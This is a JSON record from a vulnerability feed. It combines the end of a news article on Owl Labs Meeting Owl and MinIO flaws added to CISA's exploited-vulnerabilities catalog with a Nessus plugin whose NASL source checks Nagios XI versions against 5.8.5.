[**CVE-2022-31461**](<https://nvd.nist.gov/vuln/detail/cve-2022-31461>) (CVSS score: 6.5) - Owl Labs Meeting Owl Missing Authentication for Critical Function Vulnerability\n * [**CVE-2022-31462**](<https://nvd.nist.gov/vuln/detail/CVE-2022-31462>) (CVSS score: 8.8) - Owl Labs Meeting Owl Use of Hard-coded Credentials Vulnerability\n * [**CVE-2022-31463**](<https://nvd.nist.gov/vuln/detail/CVE-2022-31463>) (CVSS score: 7.1) - Owl Labs Meeting Owl Improper Authentication Vulnerability\n * [**CVE-2023-28434**](<https://nvd.nist.gov/vuln/detail/CVE-2023-28434>) (CVSS score: 8.8) - MinIO Security Feature Bypass Vulnerability\n\nIt's worth noting that a fifth flaw impacting [Owl Labs Meeting Owl](<https://resources.owllabs.com/blog/owl-labs-update>) (CVE-2022-31460, CVSS score: 7.4), a case of hard-coded credentials, was previously added to the KEV catalog on June 8, 2022, merely days after Modzero disclosed details of the flaws.\n\nUPCOMING WEBINAR\n\n[Level-Up SaaS Security: A Comprehensive Guide to ITDR and SSPM\n\n](<https://thehacker.news/itdr-saas?source=inside>)\n\nStay ahead with actionable insights on how ITDR identifies and mitigates threats. Learn about the indispensable role of SSPM in ensuring your identity remains unbreachable.\n\n[Supercharge Your Skills](<https://thehacker.news/itdr-saas?source=inside>)\n\n\"By exploiting the vulnerabilities[...], an attacker can find registered devices, their data, and owners from around the world,\" the Swiss security consultancy firm [said](<https://modzero.com/modlog/archives/2022/05/31/en_hoot_hoot_pwn/index.html>) at the time.\n\n\"Attackers can also access confidential screenshots of whiteboards or use the Owl to get access to the owner's network. The PIN protection, which protects the Owl from unauthorized use, can be circumvented by an attacker by (at least) four different approaches.\"\n\nEven more troublingly, the devices can be turned into rogue wireless network gateways to a local corporate network remotely via Bluetooth by arbitrary users and can be abused to act as a backdoor to owners' local networks. It's currently not known how these vulnerabilities are exploited in the wild.\n\nThe security weakness impacting MinIO has come under abuse in recent months, with Security Joes [revealing](<https://thehackernews.com/2023/09/hackers-exploit-minio-storage-system.html>) that an unnamed threat actor is exploiting it in conjunction with CVE-2023-28432 (CVSS score: 7.5) to achieve unauthorized code execution on susceptible servers and drop follow-on payloads.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-09-20T05:28:00", "type": "thn", "title": "Trend Micro Releases Urgent Fix for Actively Exploited Critical Security Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2017-6884", "CVE-2021-3129", "CVE-2022-22265", "CVE-2022-31459", "CVE-2022-31460", "CVE-2022-31461", "CVE-2022-31462", "CVE-2022-31463", "CVE-2023-28432", "CVE-2023-28434", "CVE-2023-41179"], "modified": "2023-09-20T06:45:41", "id": "THN:5DE1AFFE846F520E25E276A08DEE7083", "href": "https://thehackernews.com/2023/09/trend-micro-releases-urgent-fix-for.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-09-24T16:08:39", "description": "According to the self-reported version of Nagios XI, the remote host is affected by multiple vulnerabilities, including the following:\n\n - A path traversal vulnerability exists in Nagios XI below version 5.8.5 AutoDiscovery component and could lead to post authenticated RCE under security context of the user running Nagios. (CVE-2021-37343)\n\n - Nagios XI before version 5.8.5 is vulnerable to local privilege escalation because xi-sys.cfg is being imported from the var directory for some scripts with elevated permissions. (CVE-2021-37345)\n\n - Nagios XI before version 5.8.5 is vulnerable to SQL injection vulnerability in Bulk Modifications Tool due to improper input sanitisation. (CVE-2021-37350)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-09-24T00:00:00", "type": "nessus", "title": "Nagios XI < 5.8.5 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-33177", "CVE-2021-33179", "CVE-2021-36363", "CVE-2021-36364", "CVE-2021-36365", "CVE-2021-36366", "CVE-2021-37343", "CVE-2021-37345", "CVE-2021-37347", "CVE-2021-37348", "CVE-2021-37349", "CVE-2021-37350", "CVE-2021-37351", "CVE-2021-37352"], "modified": "2023-09-21T00:00:00", "cpe": ["cpe:/a:nagios:nagios_xi"], "id": "NAGIOSXI_5_8_5.NASL", "href": "https://www.tenable.com/plugins/nessus/153612", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153612);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/21\");\n\n script_cve_id(\n \"CVE-2021-33177\",\n \"CVE-2021-33179\",\n \"CVE-2021-36363\",\n \"CVE-2021-36364\",\n \"CVE-2021-36365\",\n \"CVE-2021-36366\",\n \"CVE-2021-37343\",\n \"CVE-2021-37345\",\n \"CVE-2021-37347\",\n \"CVE-2021-37348\",\n \"CVE-2021-37349\",\n \"CVE-2021-37350\",\n \"CVE-2021-37351\",\n \"CVE-2021-37352\"\n );\n script_xref(name:\"IAVB\", value:\"2021-B-0053-S\");\n\n script_name(english:\"Nagios XI < 5.8.5 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a web application affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the self-reported version of Nagios XI, the remote host is affected by multiple vulnerabilities, including\nthe following:\n\n - A path traversal vulnerability exists in Nagios XI below version 5.8.5 AutoDiscovery component and could lead to post \n authenticated RCE under security context of the user running Nagios. (CVE-2021-37343)\n\n - Nagios XI before version 5.8.5 is vulnerable to local privilege escalation because xi-sys.cfg is being imported from \n the var directory for some scripts with elevated permissions. (CVE-2021-37345)\n\n - Nagios XI before version 5.8.5 is vulnerable to SQL injection vulnerability in Bulk Modifications Tool due to improper \n input sanitisation. (CVE-2021-37350)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nagios.com/downloads/nagios-xi/change-log/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nagios.com/products/security/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Nagios XI 5.8.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-37350\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Nagios XI Autodiscovery Webshell Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:nagios:nagios_xi\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 Tenable Network Security, Inc.\");\n\n script_dependencies(\"nagios_enterprise_detect.nasl\");\n script_require_keys(\"installed_sw/nagios_xi\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('http_func.inc');\ninclude('vcf_extras.inc');\n\nvar app = 'nagios_xi';\n\n# Get the ports that web servers have been found on.\nvar port = get_http_port(default:80, embedded:TRUE);\n\nvar app_info = vcf::nagiosxi::get_app_info(port:port);\n\nvar constraints = [\n {'fixed_version': '5.8.5'}\n];\n\nvcf::nagiosxi::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, default_fix:'5.8.5');\n", "cvss": {"score": 0.0, "vector": "NONE"}}]}